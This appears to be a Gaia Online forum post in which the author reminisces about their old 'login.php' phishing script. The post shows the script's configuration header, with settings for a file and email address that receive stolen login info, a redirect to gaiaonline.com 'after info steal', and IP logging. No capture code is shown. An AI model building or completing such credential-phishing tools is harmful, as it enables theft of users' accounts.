Im tempti | Forum | Gaia Online

Somebody posed as me, spelled my name wrong, and posted my old login.php code. Just thought it was cool to see this again

Code:
<?php
/************************************************************************/
/* TEMPTii's Enhanced Login.php */
/* ============================ */
/* */
/* Config.php by John Abramson (TEMPTii) */
/* Provided by Logicalgamers.com */
/* */
/* ________ _______ ___ ___ _______ ________ __ __ */
/* |___ ___| | ____| | / | | | |___ ___| |__| |__| */
/* | | | |____ | / | | | | | __ __ */
/* | | | _____| | / | | ____| | | | | | | */
/* | | | |____ | | /| | | | | | | | | | */
/* |__| |_______| |__| __/ |__| |__| |__| |__| |__| */
/* */
/************************************************************************/

/************************************************************************/
/* Name of info file to write to */
/************************************************************************/
$file = "password.html";

/************************************************************************/
/* Email to send info to (leave blank to disable) */
/************************************************************************/
$email = "example@hotmail.com";

/************************************************************************/
/* Page to Redirect to after info steal */
/************************************************************************/
$redirect = "http://gaiaonline.com";

/************************************************************************/
/* Whether to record user IP or not (1 = True, 0 = False) */
/************************************************************************/
$ipbln = "1";

?>